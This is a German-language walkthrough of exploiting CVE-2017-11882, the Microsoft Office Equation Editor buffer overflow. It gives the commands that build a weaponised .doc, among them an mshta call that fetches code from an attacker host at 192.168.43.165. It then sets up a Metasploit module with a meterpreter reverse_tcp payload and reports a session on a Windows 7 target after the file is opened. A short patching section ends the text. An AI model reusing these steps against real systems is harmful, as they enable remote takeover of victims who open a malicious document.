
CVE-2017-11882 (wirksam gegen Office 2003 bis 2016)
Aus der Perspektive der Exploit-Wirkung kann es alle Versionen von Office 2003 bis 2016 abdecken, und der Aufbau der gesamten Angriffsumgebung ist sehr einfach. Diese Schwachstelle wird durch den [Formeleditor] in der Office-Software verursacht. Da der Editorprozess die Länge des Namens nicht überprüft, kommt es zu einem Pufferüberlauf. Durch das Konstruieren spezieller Zeichen kann der Angreifer beliebigen Code ausführen. Ein Beispiel: Wenn ein Hacker diese Schwachstelle ausnutzt und eine Office-Datei mit einer Shell-Hintertür erstellt, kann der Computer direkt vom Hacker kontrolliert werden, sobald ein normaler Benutzer diese Office-Datei öffnet.
office 2003
office 2007
office 2010
office 2013
office 2016
python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc

Klickt man auf die erzeugte Datei „test.doc“, öffnet sich problemlos das Rechner-Tool.
python Command_CVE-2017-11882.py -c "mshta http://192.168.43.165:8080/11882" -o 11882-3.doc


Die Word-Datei 11882-3.doc wurde erfolgreich erstellt.
Legen Sie die Datei cve_2017_11882.rb in das Verzeichnis /usr/share/metasploit-framework/modules/exploits/windows/smb:
msf > search CVE-2017-11882
msf > use exploit/windows/smb/CVE-2017-11882
msf exploit(CVE-2017-11882) > set payload windows/meterpreter/reverse_tcp
msf exploit(CVE-2017-11882) > set lhost 192.168.43.165
msf exploit(CVE-2017-11882) > set uripath 11882
msf exploit(CVE-2017-11882) > exploit
Listener starten:

Klicken Sie auf die Datei 11882-3.doc auf dem Win7-Zielsystem – das Erlangen der Session war erfolgreich!

① Online-Update: Aktivieren Sie Windows Update. Für die meisten Menschen reicht diese Methode aus.
② Patch einspielen: Die entsprechende Microsoft-Patch-Adresse für diese Schwachstelle lautet: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882